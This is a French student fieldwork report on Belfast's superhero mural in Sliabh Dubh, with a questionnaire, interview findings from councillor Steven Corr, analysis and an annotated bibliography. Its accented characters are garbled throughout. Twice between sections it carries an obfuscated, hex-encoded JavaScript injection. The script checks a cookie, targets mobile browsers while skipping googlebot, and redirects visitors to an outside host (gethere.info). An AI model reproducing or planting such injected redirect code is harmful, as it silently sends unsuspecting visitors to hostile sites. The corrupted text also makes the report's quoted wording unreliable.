Annexe

Questionnaire & Guide d’entretien

 

Questions pour les passants:

    1. AStes-vous du quartier ou de passage? Are you from the neighborhood or are you just passing by?
    2. Que pensez-vous de ce mural? What do you think about this mural?
    3. Est-ce que vous A?tes au courant des raisons pour lesquelles cette fresque A� A�tA� peinte? Do you know the reason of its painting?
    4. Pensez-vous que la rA�alisation de ce mural A�tait une bonne idA�e? Do you think the realisation of this painting was a good idea?
    5. Vous souvenez-vous de ce qui y figurait avant les super-hA�ros? Que pensez-vous du changement? Do you remember what was here before the superheroes? What do you think of the change?
    6. Pensez-vous que la peinture de ce mural a renforcA� la cohA�sion du quartier? Do you think that the painting of this mural reinforced social cohesion in the quarter?

Guide da��entretien pour la��interview de Steven Corr:

  1. Avez-vous une idA�e de la raison pour laquelle le mur des super-hA�ros a A�tA� peint? Do you have an idea of why the superhero wall was painted?
  2. Pourquoi pensez-vous que cet emplacement a A�tA� choisi? Why do you think this spot was chosen?
  3. Savez-vous comment ont rA�agi les gens aprA?s la crA�ation de ce mural? Do you know how the people reacted after the creation of this mural?
  4. Pensez-vous que le mural a le mA?me effet aujourda��hui sur la communautA� de Sliabh Dubh que lors de son inauguration? Do you think that the mural still has the same effect on Sliabh Dubha��s population as when it was inaugurated?
  5. A votre connaissance, y a-t-il da��autres projets de ce genre en cours? Do you know if there are other projects of the same type in course?
  6. A quel point sa��est impliquA� la mairie dans le projet de crA�ation de ce mural? How was the City Hall involved in the creation of this mural?
  7. Y a-t-il une dimension touristique au mural des super-hA�ros? Est-ce un de ses buts? Is there a touristic dimension to the superheroes wall? Is that one of its purposes?
  8. Avez-vous une idA�e de comment gA�rer les images du conflit sans raviver la haine qui y est liA�e? Do you have an idea of how to handle conflict-related images without reviving the hatred?

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

DonnA�es et Analyse

Nous allons prA�senter nos donnA�es par thA�matiques, regroupant ainsi des informations obtenues de diffA�rentes sources pour en faire le lien et les analyser en faisant ressortir des tendances.

1) Projet du mural:

[Informations rA�coltA�es avant le voyage] Le projet du mural des super-hA�ros date de 2013 et a A�tA� rA�alisA� par Danny Devenney, peintre rA�publicain spA�cialisA� en murals, avant quoi le mur abritait des graffitis. Le design de cette faA�ade a A�tA� imaginA� par les jeunes de la communautA� du quartier, et sa rA�alisation a A�tA� possible grA?ce au support de plusieurs organisations: the Housing Executive Sliabh Dubh Residents Association, the Fold Housing Association, the Black Mountain Shared Spaces Project et the Upper Springfield Development Forum1. Ces diffA�rentes associations de quartier ont toutes pour objectif une bonne cohA�sion sociale des habitants. Le programme du Building Relationships in Communities, appelA� BRIC, est celui qui a commandA� la rA�alisation de cette peinture, avec le but da��embellir les relations entre les habitants de la rA�gion, A�tant donnA� que le but premier de ce programme est celui de la��amA�lioration de relations entre diffA�rentes communautA�s de la��Irlande du Nord.
[DonnA�es da��entretien] La��aboutissement du projet du mural sur les super-hA�ros a rencontrA� quelques soucis. En effet, les opposants au mural soulignaient le fait que peindre une telle fresque tuerait la��histoire et que des reprA�sentations du conflit seraient plus A�ducatrices et bA�nA�fiques pour les enfants.

[Questionnaire aux passants] Ce mural A�tait destinA� aux enfants du quartier.

Analyse: Nous avons pu rA�colter les informations de factuelles en amont. Nous nous sommes aperA�u que, contrairement A� ce que la��on pensait a priori, les passant ne savait pas grand chose du mural des super-hA�ros. Du moins ca��est le cas des quatre personnes que nous avons eu la��occasion d’interroger. Sa��ils ne le savent pas pertinemment, les passants interrogA�s ont cependant la��air da��avoir compris que le mural des super-hA�ros est effectivement destinA� aux enfants. Pour ce qui est des donnA�es rA�coltA�es lors de la��entretiens avec le conseiller Steven Corr, nous sommes dans la��obligation de le croire sur parole faute da��avoir une confirmation de ses propos par un potentiel contestataire du projet.

2) Mural des super-hA�ros:

[Observations]

– AtmosphA?re: Les seuls points A� relever sont la permanence du bruit des voitures passant sur la route principale, se situant juste A� cA?tA� du mur, ainsi que les bavardages en provenance de la��A�cole du quartier.

Analyse: La��atmosphA?re relevA�e semble en accord avec les objectifs premiers de la rA�alisation du mural, A�tant donnA� la proximitA� da��une A�cole, qui garantit donc le passage da��enfants devant la fresque.

– Mesures: longueur da��environ 11m19.

Analyse: Ce mural est relativement long, par rapport A� da��autres fresques que nous avons eu la��occasion da��observer A� Belfast. Nous pouvons donc imaginer que ses dimensions augmentent son impact dans la��espace public.

– Situation du mural:

[Observation] Nous avons repA�rA� une fresque commA�morant les A�vA?nements du a�?Bloody Sundaya�? de 1972 A� quelques mA?tres derriA?re notre mural.
Nous avons A�galement dA�couvert, de la��autre cA?tA� de la rue et perpendiculairement A� notre mural, une fresque reprA�sentant des princesses Disney.
[Questionnaire aux passants] Le mural a A�tA� peint A� cet emplacement, car le quartier de Sliabh Dubh existe depuis une dizaine da��annA�es et est donc relativement rA�cent, et car la��A�cole primaire John Paul II se trouve aux alentours.
[DonnA�es da��entretien] Sliabh Dubh signifie a�?Black Mountaina�? en gaA�lique, en rA�fA�rence A� la colline se trouvant A� la��ouest du quartier. Avant de rA�cemment A?tre transformA�e en zone rA�sidentielle, une fabrique se situait lA� oA? se dresse aujourda��hui le quartier.

Analyse:
– Le mot a�?massacrea�? en lettres capitales est visible de loin depuis la route ainsi que depuis le quartier rA�sidentiel. Pour ces raisons, la mise en place du mural des super-hA�ros sur les murs de la��entrA�e dans Sliabh Dubh A� un impact da��autant plus fort, car la prA�sence de ces personnages mythiques pour les enfants apporte de la couleur au paysage, contrastant avec la prA�sence nA�gative et sombre du mot a�?massacrea�? non loin de lA�.
– Nous observons que la notion de la��A�cole primaire revient, ce qui signifie que notre supposition lors de la��observation de la��atmosphA?re du mural est vA�rifiA�e par la��un des habitants du voisinage.
– Le mural de princesses augmente considA�rablement la contribution de la reprA�sentation non-partisane dans la��espace public, de part ses aussi grandes dimensions que celui des super-hA�ros.

– a�?LA�gendea�? du mural: Une plaque figure dans le coin de la fresque, en haut A� gauche, stipulant: a�?Supported by bric programme through European Peace III programmea�?, et comportant A�galement les logos de chaque entitA� ayant participA� au projet de rA�alisation du mural.

Analyse: Le nom complet du programme est a�?EU Programme for Peace and Reconciliation in Northern Ireland and the Border Region of Irelanda�?, ce qui le rend pertinent avec notre sujet. De plus, il a A�tA� mis en action de 2007 A� 2013, sa fin coA?ncidant parfaitement avec la planification et rA�alisation du mural des super-hA�ros. Le but de ce programme A�tait de renforcer le progrA?s vers la paix et vers une sociA�tA� stable et de promouvoir la rA�conciliation entre les communautA�s da��Irlande du Nord. Le programme visait A� amA�liorer les relations communautaires au niveau local, tout en rendant compte du passA�, et crA�er des espaces publics ouverts et partagA�s. La spA�cificitA� de ce projet est le fait que son financement fut en partie opA�rA� par des association communautaires et des partis volontaires, qui A�taient ensuite libres de contacter la��autoritA� responsable de leur rA�gion pour mettre vie A� diffA�rents projets.
Le mural des super-hA�ros a donc A�tA� rA�alisA� A� des buts dA�passant le simple objectif de rendre heureux les enfants, comme ce que nous verrons plus loin, pensent les passants rencontrA�s.

3) La��impact du mural:

[DonnA�es da��entretien] Ce projet a la��avantage da��avoir permis aux jeunes de la communautA� de sa��exprimer da��une maniA?re semblable A� celle des peintres adultes.
[Questionnaire aux passants] Un de nos interrogA�s, un habitant du quartier, nous tA�moigna son ressenti da��une meilleure cohA�sion sociale depuis la prA�sence des deux murals dA�diA�s aux enfants dans le paysage. Il souligna A�galement que ce mur anciennement vierge na��A�tait pas respectA� par les enfants, qui jetaient leurs ballons dessus, na��y portant aucun intA�rA?t; fait complA?tement absent A� prA�sent que ce mur en question est recouvert de leurs idoles. Il nous fit part de son opinion sur le mural: grandir autour de fresques telles celle des super-hA�ros est bA�nA�fique pour les enfants, et la crA�ation de nouveaux murals semblables est, selon lui, un trA?s bon moyen de construire un meilleur avenir pour les futures gA�nA�rations.
Un autre de nos interviewA�s A�tait un homme du troisiA?me A?ge, accompagnA� de son petit fils. Ils na��habitaient pas le quartier, mais au Sud de Belfast, et se trouvaient lA�, A� prendre des photos, car ils avaient dA�couvert la��existence de ce mural dans un livre et que la��enfant exprima la��envie da��avoir des photos de soi-mA?me accompagnA� de ses hA�ros favoris.
Les impressions A�tant le plus ressorties sont le fait que le mur des super-hA�ros est trA?s apprA�ciA�.

Analyse: Avec un but de faire ressortir le ressenti gA�nA�ral des habitants sur la fresque et les effets de sa rA�alisation sur la communautA�, nous nous sommes basA�es sur une analyse comparative des rA�sultats du questionnaire, nous concentrant sur les points communs des rA�ponses de sorte A� en ressortir une tendance. Bien que nos rA�sultats ne peuvent A?tre gA�nA�ralisA�s, A�tant donnA� que notre A�chantillon na��est pas reprA�sentatif de la population, ils nous permettent tout de mA?me da��avoir une vague idA�e de la��impact social du mural A�tudiA�.

La��information A�tant le plus ressortie est le bA�nA�fice du mur des super-hA�ros pour les enfants du quartier; et nous pouvons affirmer qua��au travers du fait que des habitants de Belfast se dA�placent pour le voir, il est trA?s apprA�ciA� par les jeunes gA�nA�rations et constitue une attraction qui les attire.
Le respect de jeunes envers le mur pourrait A?tre considA�rA� comme le rA�sultat da��un impact A�ducatif de ce mural.

4) RA�gion de Ballymurphy:

[Entretien] Il existe un projet en cours visant A� relancer la��A�conomie du quartier par la construction da��un nouvel hA?tel destinA� aux touristes A� cA?tA� du cimetiA?re de Ballymurphy, de sorte A� crA�er des emplois pour les habitants des environs.
La zone de Ballymurphy observe dA�jA� depuis un bon moment des problA?mes de drogue et de suicide. Actuellement, deux projets de murals sont en cours et ont comme thA?me le suicide et comme objectif sa prA�vention. A�Children can spell better the word suicide than the word happinessA�, qui veut dire a�?Les enfants savent mieux A�peler le mot suicide que le mot bonheura�?.
Lors du tour de la rA�gion avec le conseiller, nous avons dA�couvert un mural relativement long sur Beechmount Avenue. Celui-ci est recouvert de portraits de victimes catholiques assassinA�es durant le conflit. Juste en face se trouve un mA�morial aux morts ayant pris directement part au conflit et A�tant pour la plupart membres de la��IRA. Steven Corr nous prA�cisa qua��un tel mural a une forte influence psychologique sur les enfants passant devant tous les jours sur leur trajet scolaire. Ce phA�nomA?ne avait A�tA� sa principale motivation pour soutenir le projet da��un mur non-partisan, dont le contenu serait choisi par les enfants et donc beaucoup plus joyeux et positif pour leur moral qua��un nouveau mural traitant du conflit de Belfast. Il a aussi A�tA� inspirA� par la citation de Bobby Sands prA�sente sur le trottoir da��en face du mural a�?MURDEREDa�?. Celle-ci dit: A�Our revenge will be the lauther of our childrenA�, qui en franA�ais veut dire a�?notre vengeance sera le rire de nos enfantsa�?.

Analyse: La��inquiA�tude des habitants de Belfast pour les futures gA�nA�rations tend A� beaucoup ressortir lors de discussions avec eux. En effet, nous pouvons nous poser la question de la��impact du conflit sur les enfants et des mesures prises pour le minimiser. Notre hypothA?se initiale, comme quoi la��art non-partisan serait un moyen da��attA�nuer la��hA�ritage nA�gatif du conflit, est corroborA�e par le discours du conseiller. Cela dit, ce postulat ne peut A?tre A�tendu A� da��autres personnes, A�tant donnA� l’absence de donnA�es supplA�mentaires A� ce sujet.
Le mot a�?MURDEREDa�? A�crit en rouge et en gras parsA?me le mural de Beechmount Avenue, A�tant A�crit sous chacune des photos et sautant directement aux yeux, scandalisant les A�vA?nements auxquels le mural rA�fA?re. Nous observons un phA�nomA?ne de glorification des hA�ros de guerre et de dA�nigrement des loyalistes, considA�rA�s ici comme des meurtriers de masse. La rue sur laquelle se situe ce mural a, de part le mA�morial se situant en face et la mise en avant des A�vA�nements macabres, un aspect de cimetiA?re et de lieu de mA�moire tragique.

5) ThA�matique du non-partisan:

[Questionnaire aux passants] Selon la��un de nos interrogA�s, les murals de Belfast traitant du conflit sont trA?s A�ducatifs et ne devraient en aucun cas A?tre retirA�s.

[DonnA�es da��entretien] La destruction da��un mural tel que celui des portraits a�?MURDEREDa�? aurait un impact chaotique auprA?s de la communautA�, car les visages sur ce mur sont familiers et appartiennent A� des personnes que les habitants ont rA�ellement connu. Le fait de garder ce genre de reprA�sentation macabre serait donc un moyen de perpA�tuer la gloire de ces victimes et da��A�vier des effusions de violence, ainsi qua��un outrage gA�nA�ral.
Le point fort da��un mural tel que celui des super-hA�ros serait, pour le conseiller, le fait qua��il apporte de la joie et de la��espoir aux nouvelles gA�nA�rations; en contraste avec les reprA�sentations dA�nonA�ant les loyalistes comme les coupables absolus de la mort da��un grand nombre de victimes.
Nous avons A�galement appris lors de cet entretien que chaque rA�gion sa��occupe des murals qui sont dans ses dA�limitations. Les fresques peintes sur les murs sont soit financA�es par le ministA?re, soit par des associations ou des groupes da��art. La mairie na��est aucunement inclue dans aucun projet de mural et aucune demande na��a besoin de lui A?tre formulA�e pour la crA�ation de nouvelles fresques.
Steven Corr nous a appris que les murals non partisans constituent 10% de ceux de Belfast et se situent dans des quartiers pA�riphA�riques, comme Sliabh Dubh. Cette politique de crA�ation de murals na��ayant aucun rapport direct avec le conflit entre les rA�publicains et les loyalistes consiste A� mettre en avant la culture et le sports. Il nous a expliquA�es qua��il ne sa��agit pas d’effacer la��histoire, mais de mettre en valeur da��autres aspects de Belfast dont les citoyens peuvent A?tre fiers et qui ne suscitent pas une A�motion qui engendrerait des actes de violence. La localisation des muraux non partisans est choisie principalement au hasard, selon les lieux oA? il y a de la place.
Lors du tour, nous avons A�galement A�tA� amenA�es devant une fresque non partisanne, sur Beechview Park, nommA�e Olympic medal winner, reprA�sentant le Titanic et les jeux olympiques. Steven Corr nous apprend que la peinture de cette fresque a coA�tA� six milles livres sterling; fait dA�concertant lorsque la��on observe son A�tat da��aujourda��hui. Le mural A� A�tA� vandalisA� et des graffitis le recouvrent A� de multiples endroits.

Analyse: Nous pouvons faire un lien avec ce qui a A�tA� dit lors de la confA�rence de Naomi Doak et de Robert Heslip sur la politique touristique mise en place par la municipalitA� de Belfast, les questions d’hA�ritage du conflit et le dark tourism (voir article ConfA�rence sur le tourisme: Quel avenir pour Belfast?); le problA?me qui rA�side avec les murals non-partisans est qua��ils sont contradictoires avec la promotion du dark tourism de la ville de Belfast, car ils effacent le passA� conflictuel pour lequel les touristes viennent visiter les lieux. En revanche, ce nouveau type de murals est en accord avec la promotion du a�?phoenix tourisma�? que la municipalitA� essaye de mettre en avant, dans le but de montrer un aspect plus positif de la ville.
Nous observons une tendance des habitants A� penser que les murals traitant du conflit sont A�ducatifs et mA�ritent leur place dans la vie des nouvelles gA�nA�rations grandissantes, A�tant donnA� qua��ils rendent compte de la��histoire de leur patrie.
De plus, nous observons chez le dirigeant de la rA�gion de Ballymurphy une volontA� de mettre en avant des aspects de la ville autres que ceux du conflit, auxquels chaque habitant pourrait sa��identifier sans ressentir de la haine.

Pour ce qui est du mural Olympic medal winner, nous avons eu la confirmation qua��il a A�tA� peint pour la paix et illustrer da��autres symboles de fiertA� auxquelles les belfastois peuvent sa��identifier. Il entre donc bel et bien dans le registre des murals non-partisans pour une meilleur cohA�sion sociale2.


6) Politique du conseiller:

[DonnA�es da��entretien] Steven Corr essaye da��appuyer les projets de peinture de tous types de murals, principalement dans la��optique de lA�guer un patrimoine plus joyeux aux nouvelles gA�nA�rations tout en perpA�tuant la mA�moire des conflits de Belfast. Il nous a informA�es qua��il organise chaque A�tA�, en aoA�t, un festival A� Belfast pour les enfants: A�kids partyA�, oA? figurent barbecues et jeux. Le but de ce festival serait da��apporter une meilleure cohA�sion dans le quartier, ce qui nous amA?ne A� la tactique du conseiller pour dA�passer le conflit: faire en sorte que les enfants ne se sentent plus concernA�s par celui-ci.
Il faudrait, da��aprA?s lui, essayer de concilier les projets historiques avec les culturels, car les rA�gions oA? se trouvent les murals sont principalement des rA�gions de dA�pression sociale.

Analyse: Gardant en tA?te le fait que ce genre de discours est typique da��un agent politique et pourrait A�ventuellement figurer dans sa campagne, nous pouvons tout de mA?me dire que cette diversitA� a une chance de promouvoir les murals non-partisans dans la rA�gion de Ballymurphy. De plus, nous avons pu observer, en voyant notre interviewA� interagir avec des passants, qua��il est effectivement proche de sa communautA�, et de par son attitude familiA?re lors de notre entretien, nous pouvons dire sans trop nous avancer qua��il est fortement investi dans son domaine politique.

[1]A�HousingExclusive (18 dA�cembre 2013), Art project has super impact on community spirit, [En ligne] URL:A�http://www.nihe.gov.uk/news-art-project-has-super-impact-on-community-spirit

[2]A�Beyond the Walls (2012), Olympic Medal Winners, [En ligne] URL:A�http://beyondthewallsthefilm.com/portfolio/arabeh-prisoner-mural/

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Bibliographie commentA�e

Cette vidA�o-reportage nommA�e a�?Olympics medal winnersa�?, en rA�fA�rence au mural rA�alisA�e par Danny Devenny, Mark Ervine, Marty Lyons et Liam MacGabhann, parle du fait que depuis les accords de paix, les peintres de murals loyalistes et rA�publicains travaillent ensemble. Depuis la fin du conflit, la moyenne de suicides des jeunes a augmentA� et la consommation de drogue aussi. Les artistes tentent da��aider ces jeunes en difficultA� avec la crA�ation de murals tels que celui sur les Jeux Olympiques, crA�A� en 2012, lorsque ceux-ci se dA�roulaient A� Londres.

  • CURRAN Barry, MATIER Philip (17 janvier 2010), A�Paint for peaceA�, in Northern Visions NvTv Vimeo, [En ligne] URL:A�https://vimeo.com/8795619, consultA� le 06.01.2016.

Ca��est une vidA�o reportage nommA�e a�?Paint for Peacea�? publiA�e par la chaA�ne de Northern Visions NvTvPRO sur Vimeo. Ce reportage nous parle de deux peintres de murals de deux bords politiques opposA�s, Danny Devanney (rA�publicain et peintre du mur des super-hA�ros) et Mark Ervine (loyaliste) qui vont travailler ensemble et apporter une vision positive du futur grA?ce A� leur art. De cette rencontre va naA�tre une amitiA� oA? il na��est plus influencA�e par le milieu de provenance de chacun.

Le Housing Executive A� A�tA� impliquA� dans la crA�ation du mur des super-hA�ros. Ce site nous explique en quoi il consiste; il est prA�sentA� comme A�tant la��autoritA� de la stratA�gie de logement de la��Irlande du Nord A�tablie en 1971, offrant des services sociaux de rente. Cet organisme sa��occupe da��environ 90a��000 logements dans le Nord de la��Irlande. Ce qui est intA�ressant est que cette organisation sa��est impliquA�e dans le mur des super-hA�ros alors qua��elle est orientA�e sur les logements. On peut en dA�duire qua��elle estime que le mur des super-hA�ros est un A�lA�ment positif dans le dA�cor urbain, et donc que cela peut inciter les gens A� emmA�nager dans ce quartier.

Ca��est dans cet article que nous avons trouvA� le nom de la��artiste, Danny Devanney, qui a peint le mur des super-hA�ros, ainsi que ses commanditaires, Building Relationships in Communities (BRIC), et les associations en soutien du projet: the Housing Executive Sliabh Dubh Residents Association, the Fold Housing Association, the Black Mountain Shared Spaces Project et the Upper Springfield Development Forum. Il nous informe aussi que ce mural attire beaucoup la��attention. Cet article nous a A�tA� capital pour commenter notre problA�matique.

Cet article parle de l’inauguration du mur Olympic medal winner, mentionnant le fait que a�?cette fois A�a na��a rien a voir avec la politiquea�?. Cet article nous intA�resse car ce mural a, comme celui des super-hA�ros, A�tA� peint pour A�gailler le tajet des enfants se rendant A� la��A�cole.

Cet article explique la��European Peace III Programme, figurant sur la plaque dA�couverte sur la fresque des super-hA�ros, nous apprenant par exemple que le nom entier du programme est a�?EU Programme for Peace and Reconciliation in Northern Ireland and the Border Region of Irelanda�? et qua��il est donc intA�ressant pour notre problA�matique.

